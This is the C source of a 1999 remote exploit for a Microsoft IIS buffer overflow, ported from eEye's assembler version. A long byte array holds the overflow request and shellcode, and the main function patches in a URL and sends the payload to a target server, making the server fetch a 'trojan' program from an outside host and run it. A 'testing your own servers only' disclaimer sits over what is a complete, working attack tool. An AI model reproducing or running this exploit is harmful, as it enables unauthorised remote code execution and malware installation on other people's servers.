/* to compile on solaris: change u_int32_t to uint32_t and type: gcc -o iishack iishack.c -lnsl -lsocket -lresolv */ /***********************************************************/ /* IIS Exploit for Linux (c) 1999 Ultima */ /* ultima@snicker.emoti.com */ /* The original exploit as published by EEye was written */ /* in assembler, and is rather unportable. I wrote it in */ /* C, and it should compile and run on just about anything.*/ /* */ /* THIS IS ONLY FOR TESTING YOUR OWN SERVERS FOR THE */ /* VULNERABILITY. BY RUNNING THIS PROGRAM YOU ASSUME */ /* ALL LIABILITY FOR ANY AND ALL RESULTS CAUSED BY */ /* THIS PROGRAM, WHETHER DIRECT OR INDIRECT. IN NO CASE */ /* SHALL ULTIMA BE HELD RESPONSIBLE. */ /* */ /* Released: 6.16.1999 (Y2K Compliant!! =) */ /* */ /* This code is released under the terms of the LGPL */ /* Version 2 or later, at your discretion. */ /* */ /* The uninitialized egg was evolved from reverse- */ /* engineering the EEye exploit, and was injected into */ /* C. This is basically the same poison, with a different */ /* needle. Thanks to drkspyrit and the EEyes ppl, without */ /* which, this code would not have existed. */ /* He can be reached as barns@eeye.com. */ /* The eEye website is http://www.eEye.com */ /* Usage: ./iishack <server> <port> <trojan> */ /* The trojan is an http url (minus the http://) of a */ /* program you want to run on the server. Server and port */ /* are self-explanatory. 
*/ /* Compiling: cc -o iishack iishack.c */ /* Example: */ /* ./iishack www.notthere.com 80 www.myisp.com/exploit.exe */ /***********************************************************/ #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <stdlib.h> #include <arpa/inet.h> #define egglen 1157 #define urloff 1055 unsigned char egg[] = { 71, 69, 84, 32, 47, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 176, 135, 103, 104, 176, 135, 103, 104, 144, 144, 144, 144, 88, 88, 144, 51, 192, 80, 91, 83, 89, 139, 222, 102, 184, 33, 2, 3, 216, 50, 192, 215, 44, 33, 136, 3, 75, 60, 222, 117, 244, 67, 67, 186, 208, 16, 103, 104, 82, 81, 83, 255, 18, 139, 240, 139, 249, 252, 89, 177, 6, 144, 90, 67, 50, 192, 215, 80, 88, 132, 192, 80, 88, 117, 244, 67, 82, 81, 83, 86, 178, 84, 255, 18, 171, 89, 90, 226, 230, 67, 50, 192, 215, 80, 88, 132, 192, 80, 88, 117, 244, 67, 82, 83, 255, 18, 139, 240, 90, 51, 201, 80, 88, 177, 5, 67, 50, 192, 215, 80, 88, 132, 192, 80, 88, 117, 244, 67, 82, 81, 83, 86, 178, 84, 255, 18, 171, 89, 90, 226, 230, 51, 192, 80, 64, 80, 64, 80, 255, 87, 244, 137, 71, 204, 51, 192, 80, 80, 176, 2, 102, 171, 88, 180, 80, 102, 171, 88, 171, 171, 171, 177, 33, 144, 102, 131, 195, 22, 139, 243, 67, 50, 192, 215, 58, 200, 117, 248, 50, 192, 136, 3, 86, 255, 87, 236, 144, 102, 131, 239, 16, 146, 139, 82, 12, 139, 18, 139, 18, 146, 139, 215, 137, 66, 4, 82, 106, 16, 82, 255, 119, 204, 255, 87, 248, 90, 102, 131, 238, 8, 86, 67, 139, 243, 252, 172, 132, 192, 117, 251, 65, 78, 199, 6, 141, 138, 141, 138, 129, 54, 128, 128, 128, 128, 51, 192, 80, 80, 106, 72, 83, 255, 119, 204, 255, 87, 240, 88, 91, 139, 208, 
102, 184, 255, 15, 80, 82, 80, 82, 255, 87, 232, 139, 240, 88, 144, 144, 144, 144, 80, 83, 255, 87, 212, 139, 232, 51, 192, 90, 82, 80, 82, 86, 255, 119, 204, 255, 87, 236, 128, 252, 255, 116, 15, 80, 86, 85, 255, 87, 216, 128, 252, 255, 116, 4, 133, 192, 117, 223, 85, 255, 87, 220, 51, 192, 64, 80, 83, 255, 87, 228, 144, 144, 144, 144, 255, 108, 102, 115, 111, 102, 109, 84, 83, 33, 128, 141, 132, 147, 134, 130, 149, 33, 128, 141, 152, 147, 138, 149, 134, 33, 128, 141, 132, 141, 144, 148, 134, 33, 128, 141, 144, 145, 134, 143, 33, 120, 138, 143, 102, 153, 134, 132, 33, 104, 141, 144, 131, 130, 141, 98, 141, 141, 144, 132, 33, 120, 116, 112, 100, 108, 84, 83, 33, 147, 134, 132, 151, 33, 148, 134, 143, 133, 33, 148, 144, 132, 140, 134, 149, 33, 132, 144, 143, 143, 134, 132, 149, 33, 136, 134, 149, 137, 144, 148, 149, 131, 154, 143, 130, 142, 134, 33, 144, 152, 143, 79, 134, 153, 134, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 46, 104, 116, 114, 32, 72, 84, 84, 80, 47, 49, 46, 48, 13, 10, 13, 10, 10 }; u_int32_t resolve(char *host) /* for solaris, try uint32_t */ { struct hostent *he; long n = inet_addr(host); if(n!=-1) return(n); he = gethostbyname(host); if(!he) { herror("gethostbyname"); return(0); } memcpy(&n, he->h_addr, 4); return(*(long *)he->h_addr_list[0]); } int main(int argc, char **argv) { char *server; int port; char *url; int fd; struct sockaddr_in s_in; int i=0,x,j=0; int first=0; if(argc != 4) { fprintf(stderr, "usage: %s <server> <port> <trojan>\n", argv[0]); exit(1); } server = argv[1]; port = atoi(argv[2]); url = argv[3]; if(strlen(url) > 85) { fprintf(stderr, "Trojan name must be less than 85 characters.\n"); exit(1); } for(x=0;x<strlen(url);x++) { 
if(url[x] == '/' && !first) { first=1; egg[urloff+j]='!'+0x21;egg[urloff+j+1]='G'+0x21;egg[urloff+j+2]='E'+0x21; egg[urloff+j+3]='T'+0x21;egg[urloff+j+4]=' '+0x21;egg[urloff+j+5]='/'+0x21; j+=6; continue; } egg[urloff+j] += url[x]; j++; } fd = socket(AF_INET, SOCK_STREAM, 0); s_in.sin_family = AF_INET; s_in.sin_port = htons(port); s_in.sin_addr.s_addr = resolve(server); connect(fd, (struct sockaddr *)&s_in, sizeof(struct sockaddr_in)); while(i!=egglen) { x=send(fd, egg+i, egglen-i, 0); if(x<0) { fprintf(stderr, "Connection to target lost. WTF?\n"); exit(1); } i+=x; } printf("Trojan uploaded successfully (I think...)\n"); return(0); } /* www.hack.co.za */